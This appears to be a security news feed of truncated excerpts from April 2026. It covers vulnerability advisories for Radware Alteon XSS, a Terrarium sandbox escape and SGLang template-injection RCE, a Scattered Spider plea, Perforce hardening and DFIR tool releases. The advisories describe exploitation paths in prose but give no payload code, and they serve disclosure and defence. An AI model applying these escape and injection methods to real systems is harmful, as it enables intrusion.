A lawsuit from the Consumer Federation of America accuses Meta of misleading consumers about its efforts to combat scams advertisements on its platforms.
VU#890999: Radware Alteon has a reflected XSS vulnerability that can execute JavaScript in the host browser
Overview Radware Alteon has a reflected Cross-Site Scripting (XSS) vulnerability in the parameter ReturnTo of the route /protected/login. This vulnerability allows an attacker to execute JavaScript in the host browser. Description CVE-2026-5754: Reflected Cross-Site Scripting (XSS) vulnerability in Radware Alteon 34.5.4.0 vADC load-balancer allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized actions, data theft, or other malicious activities. A reflected Cross-Site Scripting (XSS) vulnerability exists in the ReturnTo parameter of the /protected/login route in Radware Alteon version 34.5.4.0. The vulnerability arises from the lack of user input sanitization, allowing an attacker to inject malicious scripts. Specifically, when a user requests a resource that redirects to a Microsoft SAML login page, the load-balancer redirects the user to the login page with a ReturnTo parameter that fails to sanitize user input. An attacker can exploit this by injecting a malicious payload in the ReturnTo parameter, which will be executed in the victim's browser. An example attack flow is below: Attacker creates link with XSS payload in ReturnTo parameter. Victim clicks malicious link, redirecting to login page. Load-balancer reflects malicious ReturnTo parameter, executing XSS payload. Attacker performs JavaScript code execution in the victim's browser. Impact The impact of this vulnerability is significant, as it allows an attacker to execute arbitrary JavaScript
A 24-year-old British national and senior member of the cybercrime group “ Scattered Spider ” has pleaded guilty to wire fraud conspiracy and aggravated identity theft. Tyler Robert Buchanan admitted his role in a series of text-message phishing attacks in the summer of 2022 that allowed the group to hack into at least a dozen major technology companies and steal tens of millions of dollars worth of cryptocurrency from investors. Buchanan’s hacker handle “ Tylerb ” once graced a leaderboard in the English-language criminal hacking scene that tracked the most accomplished cyber thieves. Now in U.S. custody and awaiting sentencing, the Dundee, Scotland native is facing the possibility of more than 20 years in prison. Two photos published in a Daily Mail story dated May 3, 2025 show Buchanan as a child (left) and as an adult being detained by airport authorities in Spain. “M&S” in this screenshot refers to Marks & Spencer, a major U.K. retail chain that suffered a ransomware attack last year at the hands of Scattered Spider. Scattered Spider is the name given to a prolific English-speaking cybercrime group known for using social engineering tactics to break into companies and steal data for ransom, often impersonating employees or contractors to deceive IT help desks into granting access. As part of his guilty plea, Buchanan admitted conspiring with other Scattered Spider members to launch tens of thousan
Perforce is source control software used in games, entertainment, and a few engineering sectors. It's particularly useful when large binary assets need to be stored alongside source code. It handles binary assets much better than Git, IMO. However, its one weakness is its terrible security defaults. You will die a bit inside when you see the out-of-the-box behaviour: "Don't have an account? Let me make one for you!" and "Oh, you didn't know by default there is a hidden, read-only 'remote' user that allows read access to everything? Oops!" I scanned 6,122 public Perforce servers last year. 72% were exposing source code, 21% had passwordless accounts, and 4% had unprotected superusers (which allow RCE). The vendor patched the largest issue, but a significant portion are still vulnerable. Full write-up and methodology: [https://morganrobertson.net/p4wned/](https://morganrobertson.net/p4wned/) Tools repo, including Nuclei templates to scan your infra: [https://github.com/flyingllama87/p4wned](https://github.com/flyingllama87/p4wned) **Hardening is a pain, but here it is summed up:** ``` p4 configure set security=4 # disables the built-in 'remote' user + strong auth p4 configure set dm.user.noautocreate=2 # kills auto-signup p4 configure set dm.user.setinitialpasswd=0 # users cannot self-set first password p4 configure set dm.user.resetpassword=1 # force password reset flow p4 configure set dm.info.hide=1 # hide server license, internal IP, root path p4 configure set run.users.authorize=1 # user listing requires auth p4 configure set dm.user.hideinvalid=1 # no hints on bad login p4 configure set dm.keys.hide=2 # hide stored key/value pairs from non-admins p4 configure set server.rolechecks=1 # prevent P4AUTH misuse ``` Happy to answer any questions on the research!
Overview Terrarium is a sandbox-based code execution platform that enables users to run and execute code in a controlled environment, providing a secure way to test and validate code. However, a vulnerability has been discovered in Terrarium that allows arbitrary code execution with root privileges on the host Node.js process. This vulnerability is caused by a JavaScript prototype chain traversal in the Pyodide WebAssembly environment. Description The root cause of the vulnerability lies in the configuration of jsglobals objects in service.ts . Specifically, the mock document object is created using a standard JavaScript object literal, which inherits properties from Object.prototype . This inheritance chain allows sandbox code to traverse up to the function constructor, create a function that returns globalThis , and from there access Node.js internals, including require() . As a result, an attacker can escape the sandbox and execute arbitrary system commands as root within the container. CVE-2026-5752 Sandbox Escape Vulnerability in Terrarium allows arbitrary code execution with root privileges on a host process via JavaScript prototype chain traversal. Impact Applications that use Terrarium for sandboxed code execution may be compromised, allowing an attacker to: Execute arbitrary commands as root inside the container Access and modify sensitive files, including /etc/passwd and environment variables Reach other services on the container's network, including databases and internal APIs
For us humans to interact with the online world, we need a gateway: keyboard, screen, browser, device. What is called "human detection" online are patterns that humans use when interacting with such devices. These patterns have changed in recent years: a startup CEO now uses their browser to summarize the news, a tech enthusiast automates the process to book their concert tickets when sales open at night, someone who's visually impaired enables accessibility on their screen reader, and companies route their employee traffic through zero trust proxies. At the same time, website owners are still looking to protect their data, manage their resources, control content distribution, and prevent abuse. These problems aren’t solved by knowing whether the client is a human or a bot: There are wanted bots and there are unwanted humans. These problems require knowing intent and behavior. The ability to detect automation remains critical. However, as the distinctions between actors become blurry, the systems we build now should accommodate a future where "bots vs. humans" is not the important data point. What actually matters is not humanity in the abstract, but questions such as: is this attack traffic, is that crawler load proportional to the traffic it returns, do I expect this user to connect from this new country, are my ads being gamed? What we discuss with the term “bots” is really two stories. The first is whether website owners should let known crawlers through when they are not getting traffic back. We have touched on this with bot authentication with http message signatures for crawlers that want to identify without being impersonated. The second is the emergence of new clients that do not embed the same behaviors as web browsers historically did, which matters for systems such as private rate limit . In thi
IOCX v0.7.0 is out. It’s a static IOC extraction and PE‑analysis engine built for DFIR and malware‑analysis workflows focused on deterministic behaviour. This release adds a deterministic heuristic engine, new adversarial PE samples, and a contract‑testing framework to keep output stable across runs. **Key changes in v0.7.0:** **Deterministic heuristic engine (new)** Snapshot‑tested heuristics for: * anti‑debug API usage * TLS callback anomalies * packer‑like section layouts + entropy * RWX sections * import‑table anomalies * signature anomalies Runs under `analysis_level = full` and is designed to avoid false‑positive reconstruction. **Adversarial PE samples (new)** Three intentionally hostile binaries covering: * rich/atypical imports * high‑entropy + malformed Rich Headers * split/reversed/null‑interspersed strings Useful to validate deterministic heuristics and literal-only IOC extraction. **Rich Header crash fix** Malformed Rich Headers with non‑UTF8 bytes could break JSON serialization. v0.7.0 adds a deep sanitiser that hex‑encodes nested byte structures for deterministic, JSON‑safe output. **Snapshot‑driven contract testing** Each sample has a byte‑for‑byte JSON snapshot. Output must match exactly — same file, same output, every time. **Performance** Remains \~28 MB/s on typical PE samples. **Links** GitHub: [https://github.com/iocx-dev/iocx](https://github.com/iocx-dev/iocx) PyPI: [https://pypi.org/project/iocx/](https://pypi.org/project/iocx/) **Example** `pip install iocx` `iocx suspicious.exe -a full` Happy to hear feedback from anyone working with obfuscated or adversarial PE samples.
A new 13Cubed episode is now available. I’ve got some thoughts about AI. Let’s talk about how it’s changing digital forensics, how I actually use it in practice, and what you need to know if you’re in or entering the field. [https://www.youtube.com/watch?v=wKn-9sKBqX8](https://www.youtube.com/watch?v=wKn-9sKBqX8)
Forensic readiness is not yet a clean standalone category, but enterprises are already spending on the underlying problem through digital forensics, incident response, and evidence-focused security workflows.
There’s a lot of love all over the world for GrapheneOS, the gold standard of mobile security. There’s very little love between the two guys at the center of its history.
COPENHAGEN, Denmark, 21 April 2026 — Heimdal today unveiled the next phase of its AI strategy, expanding AI Wingman with three new layers – Assist, Triage and SOC – alongside the introduction of Third-Party AI Containment. Together, these capabilities build on Heimdal’s existing AI-powered protection and give organisations a clearer way to manage AI safely, speed […] The post Heimdal Expands AI Strategy with AI Wingman and Third-Party AI Containment appeared first on Heimdal Security Blog .
What Happens When Sara Pentest Gets Six Hours With a Live Application In a single six-hour session, with no human intervention, Sara found and fully exploited multiple high-severity vulnerabilities across a live application including a SQL injection (SQLi), an admin account takeover, and stored cross-site scripting. In fact, 70% of Sara’s findings on this target […] The post How Sara Pentest is Changing the Game for AI Pentesting appeared first on Synack .
Monday, April 20
VU#915947: SGLang is vulnerable to remote code execution when rendering chat templates from a model file
Overview A remote code execution vulnerability has been discovered in the SGLang project, specifically in the reranking endpoint (/v1/rerank) . A CVE has been assigned to track the vulnerability; CVE-2026-5760. An attacker can create a malicious model for SGLang to achieve RCE. Successful exploitation could allow arbitrary code execution in the context of the SGLang service, potentially leading to host compromise, lateral movement, data exfiltration, or denial-of-service (DoS) attacks. No response was obtained from the project maintainers during coordination. Description SGLang is an open-source framework for serving large language models (LLMs) and multimodal AI models, supporting models such as Qwen, DeepSeek, Mistral, and Skywork, and is compatible with OpenAI APIs. A vulnerability, tracked as CVE-2026-5760, has been discovered within the reranking endpoints. Using a cross-encoder model, the reranking endpoint reranks documents based on their relevance to a query. An attacker exploits this vulnerability by creating a malicious GPT Generated Unified Format (GGUF) model file with a crafted tokenizer.chat_template parameter that contains a Jinja2 server-side template injection (SSTI) payload with a trigger phrase to activate the vulnerable code path. A tokenizer.chat_template is a metadata field that defines how text is structured before being processed. The victim then downloads and loads the model in SGLang, and when a request hits the /v1/rerank endpoint, the malicious template is rendered, executing the attacker's arbitrary Python code on the server. This sequence of events enables the attacker to achieve remote code execution (RCE) on the SGLang server. The vulnerability arises from the use of jinja2.Environment() without sandboxing in the
Code review is a fantastic mechanism for catching bugs and sharing knowledge, but it is also one of the most reliable ways to bottleneck an engineering team. A merge request sits in a queue, a reviewer eventually context-switches to read the diff, they leave a handful of nitpicks about variable naming, the author responds, and the cycle repeats. Across our internal projects, the median wait time for a first review was often measured in hours. When we first started experimenting with AI code review, we took the path that most other people probably take: we tried out a few different AI code review tools and found that a lot of these tools worked pretty well, and a lot of them even offered a good amount of customisation and configurability! Unfortunately, though, the one recurring theme that kept coming up was that they just didn’t offer enough flexibility and customisation for an organisation the size of Cloudflare. So, we jumped to the next most obvious path, which was to grab a git diff, shove it into a half-baked prompt, and ask a large language model to find bugs. The results were exactly as noisy as you might expect, with a flood of vague suggestions, hallucinated syntax errors, and helpful advice to "consider adding error handling" on functions that already had it. We realised pretty quickly that a naive summarisation approach wasn't going to give us the results we wanted, especially on complex codebases. Instead of building a monolithic code review agent from scratch, we decided to build a CI-native orchestration system around OpenCode , an open-source coding agent. Today, when an engineer at Cloudflare opens a merge request, it gets an initial pass from a coordinated smörgåsbord of AI agents. Rather than relying on one model with a massive, generic prompt, we launch up to seven specialised reviewers covering security, performance
Today marks the end of our first Agents Week, an innovation week dedicated entirely to the age of agents. It couldn’t have been more timely: over the past year, agents have swiftly changed how people work. Coding agents are helping developers ship faster than ever. Support agents resolve tickets end-to-end. Research agents validate hypotheses across hundreds of sources in minutes. And people aren't just running one agent: they're running several in parallel and around the clock. As Cloudflare's CTO Dane Knecht and VP of Product Rita Kozlov noted in our welcome to Agents Week post , the potential scale of agents is staggering: If even a fraction of the world's knowledge workers each run a few agents in parallel, you need compute capacity for tens of millions of simultaneous sessions. The one-app-serves-many-users model the cloud was built on doesn't work for that. But that's exactly what developers and businesses want to do: build agents, deploy them to users, and run them at scale. Getting there means solving problems across the entire stack. Agents need compute that scales from full operating systems to lightweight isolates. They need security and identity built into how they run. They need an agent toolbox : the right models, tools, and context to do real work. All the code that agents generate needs a clear path from afternoon prototype to production app. And finally, as agents drive a growing share of Internet traffic, the web itself needs to adapt for the emerging agentic web . Turns out, the containerless, serverless compute platform we launched eight years ago with Workers was ready-made for this moment. Since then, we've grown it into a full platform, and this week we shipped the next wave of primitives purpose-built for agents, organized around exactly those problems. We are here to create Cloud 2.0 — the agentic cloud. Infr
In the last 30 days, 93% of Cloudflare’s R&D organization used AI coding tools powered by infrastructure we built on our own platform. Eleven months ago, we undertook a major project: to truly integrate AI into our engineering stack. We needed to build the internal MCP servers, access layer, and AI tooling necessary for agents to be useful at Cloudflare. We pulled together engineers from across the company to form a tiger team called iMARS (Internal MCP Agent/Server Rollout Squad). The sustained work landed with the Dev Productivity team, who also own much of our internal tooling including CI/CD, build systems, and automation. Here are some numbers that capture our own agentic AI use over the last 30 days: 3,683 internal users actively using AI coding tools (60% company-wide, 93% across R&D), out of approximately 6,100 total employees 47.95 million AI requests 295 teams are currently utilizing agentic AI tools and coding assistants. 20.18 million AI Gateway requests per month 241.37 billion tokens routed through AI Gateway 51.83 billion tokens processed on Workers AI The impact on developer velocity internally is clear: we’ve never seen a quarter-to-quarter increase in merge requests to this degree. As AI tooling adoption has grown the 4-week rolling average has climbed from ~5,600/week to over 8,700. The week of March 23 hit 10,952, nearly double the Q4 baseline. MCP servers were the starting point, but the team quickly realized we needed to go further: rethink how standards are codified, how code gets reviewed, how engineers onboard, and how changes propagate across thousands of repos. Thi
Years before the figure skater became an Olympic superstar, a Chinese operative tried to stalk her father and monitored other US residents deemed dissidents against China. And that’s just the beginning.
Before Cisco disclosed a CVSS 10.0 zero-day, GreyNoise sensors had already observed eight surges of targeting activity compressing from 39 days to 2 days. A new study finds this pattern repeated across 33 CVEs and 16 vendor families — with a median lead time of 11 days. Read the full findings.
Saturday, April 18
**Hey everyone,** I just pushed Crow-Eye version 0.9.1. I completely rewrote the LNK/JumpList parsers from scratch, enhanced the Prefetch parser, and standardized global UTC time handling across all artifacts. It’s faster, more resilient, and the expanded timeline visualization now supports even more artifacts. But while pushing these updates, I wanted to talk about a growing problem in our field: **The "Black Box" of Forensics.** Right now, most people depend heavily on parsers without really knowing the behavior underneath them. With AI becoming more prevalent, this problem is only going to get worse. People will start trusting outputs without understanding the binary structure or the forensic anatomy of what they are actually looking at. I have a different vision. I believe AI should make it easier for researchers to develop parsers and understand data, not just blindly output answers. That’s why I decided we need a backbone , something to help the next generation deeply understand the forensic anatomy we are studying. # 👁️ Introducing "Eye-Describe": Visualizing the Binary Truth To fix this, I am building a new educational suite called Eye-Describe. It aims to visually explain the internal binary structures of forensic artifacts directly to the user. It will show investigators exactly how the parsers work under the hood. When you are looking at extracted data (like Prefetch or Amcache), you won't just see the result. Eye-Describe will visually highlight the binary structure of the artifact, showing you exactly where in the hex data that specific evidence was extracted from, and why it matters. **A Live Example: The Windows Boot Disk Explorer** To give you a taste of this philosophy, I’ve published the first piece of this initiative online: The Interactive Tool: Windows Boot Disk Explorer (https://crow-eye.com/Eye-Describe/windows\_boot\_disk\_explorer) The Deep-Dive Article: The Anatomy of the Windows Boot Process (https://crow-eye.com/booting-process) Instead of just listing partitions, this interactive tool visually breaks down the actual physical disk architecture (UEFI+GPT vs. BIOS+MBR). When you click a segment (like the ESP or MSR), it reveals its specific forensic role, the file structure inside it, and a node-based visualization showing exactly how the files interact during the system startup sequence. https://preview.redd.it/b5m273lvu0wg1.png?width=1447&format=png&auto=webp&s=d209ec6a07b5280c796aa21b8a741f8473bfb4de \--- Coming in Crow-Eye 0.10.0: "The Eye" AI Agent While we are building out this Eye-Describe educational backbone, we are simultaneously working on our AI integration. In our next major release (0.10.0), we are introducing **The Eye** a feature that allows users to connect their own API keys or CLI agents directly into Crow-Eye. This isn't just a basic chatbot. The Eye will have direct access to the parser results generated by Crow-Eye, making it deeply aware of both your specific forensic data and general artifact behavior. It will assist investigators by: Spotting the Unseen: By analyzing the parsed results across all artifacts, The Eye can proactively spot anomalies, correlations, or hidden tracks that you might have missed during manual review. Building & Testing Hypotheses: You can propose an attack scenario, and the agent will use the actual parsed evidence to help you verify if the artifacts support or refute that hypothesis, helping you build a clear picture of the attack. Evaluating Trust: It will understand the nuances of different artifacts advising you on what data is highly reliable (like the MFT) versus what might be easily manipulated or fragile. Querying the Database: Helping you search through massive datasets using natural language. \--- 🤝 Open Call to Researchers & Reverse Engineers I’d love for you to check out the Boot Disk Explorer concept and read the article. Let me know what you think what artifacts do you think are the hardest for students to grasp and would benefit most from this kind of visual binary breakdown? If you have deep knowledge about the binary structure of specific Windows artifacts and want to help visualize them, please reach out! I believe collaborating on this will massively help the DFIR community and the next generation of investigators. You can contact me directly at: [Ghassanelsman@gmail.com](mailto:Ghassanelsman@gmail.com) GitHub Repo: [https://github.com/Ghassan-elsman/Crow-Eye](https://github.com/Ghassan-elsman/Crow-Eye) Eye-Describe : [https://crow-eye.com/Eye-Describe/windows\_boot\_disk\_explorer](https://crow-eye.com/Eye-Describe/windows_boot_disk_explorer) Boot Process Article: [https://crow-eye.com/booting-process](https://crow-eye.com/booting-process) Happy hunting!